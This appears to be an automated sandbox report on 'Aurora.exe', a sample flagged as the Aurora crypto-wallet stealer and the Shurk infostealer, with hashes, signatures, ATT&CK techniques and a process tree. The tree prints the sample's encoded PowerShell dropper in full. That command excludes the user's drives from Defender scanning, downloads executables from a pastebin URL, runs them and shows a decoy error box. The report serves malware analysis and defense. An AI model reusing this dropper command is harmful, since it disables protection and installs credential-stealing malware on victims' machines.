aurora | 4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0

General

Target

Aurora.exe
Size

25.5MB
MD5

5b5049eee909a12420356f785890ee12
SHA1

2458920623ab942e1f564cb09ae25fb02b6b76a0
SHA256

4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
SHA512

5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
SSDEEP

98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF

Score

10^/10

aurora shurk infostealer stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/tPAFrSUD

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
infostealer shurk

Shurk Stealer payload 1 IoCs

resource	yara_rule
behavioral1/memory/1468-60-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer

Blocklisted process makes network request 7 IoCs

flow	pid	Process
4	1440	powershell.exe
6	1440	powershell.exe
7	1440	powershell.exe
8	1440	powershell.exe
9	1440	powershell.exe
10	1440	powershell.exe
11	1440	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
764	LXIX.exe

Loads dropped DLL 1 IoCs

pid	Process
1468	Aurora.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1440	powershell.exe
1440	powershell.exe
1676	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 764	1468	Aurora.exe	27
PID 1468 wrote to memory of 764	1468	Aurora.exe	27
PID 1468 wrote to memory of 764	1468	Aurora.exe	27
PID 1468 wrote to memory of 764	1468	Aurora.exe	27
PID 764 wrote to memory of 1440	764	LXIX.exe	28
PID 764 wrote to memory of 1440	764	LXIX.exe	28
PID 764 wrote to memory of 1440	764	LXIX.exe	28
PID 764 wrote to memory of 1440	764	LXIX.exe	28
PID 1440 wrote to memory of 1676	1440	powershell.exe	30
PID 1440 wrote to memory of 1676	1440	powershell.exe	30
PID 1440 wrote to memory of 1676	1440	powershell.exe	30
PID 1440 wrote to memory of 1676	1440	powershell.exe	30

C:\Users\Admin\AppData\Local\Temp\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Users\Admin\AppData\Local\Temp\LXIX.exe
  "C:\Users\Admin\AppData\Local\Temp\LXIX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:764
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LXIX.exe

Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DBQ13ZV7FQNH9Y8QTKYE.temp

Filesize
7KB

MD5
084f1eee4ba93bd5073fc0561eda2e6b

SHA1
387653191d8520aaaef39408e6e9ccb51f3c5083

SHA256
6a6030149429724e86a112ae7ac3ec816b3e9abf1139612b2416968b915949a2

SHA512
3b0c185c59d4aff61b53debf17400325f67dadb0c89a6f787d75326103f43c102362a5dee178ee254e27e89b396e1b66e2e0db2052a3d07af203c1ba424793e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
084f1eee4ba93bd5073fc0561eda2e6b

SHA1
387653191d8520aaaef39408e6e9ccb51f3c5083

SHA256
6a6030149429724e86a112ae7ac3ec816b3e9abf1139612b2416968b915949a2

SHA512
3b0c185c59d4aff61b53debf17400325f67dadb0c89a6f787d75326103f43c102362a5dee178ee254e27e89b396e1b66e2e0db2052a3d07af203c1ba424793e5

Download Submit
\Users\Admin\AppData\Local\Temp\LXIX.exe

Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
memory/1440-63-0x0000000001D20000-0x0000000001D60000-memory.dmp

Filesize
256KB

Download
memory/1440-64-0x0000000001D20000-0x0000000001D60000-memory.dmp

Filesize
256KB

Download
memory/1440-65-0x0000000001D20000-0x0000000001D60000-memory.dmp

Filesize
256KB

Download
memory/1468-60-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/1676-71-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/1676-72-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/1676-73-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/1676-74-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing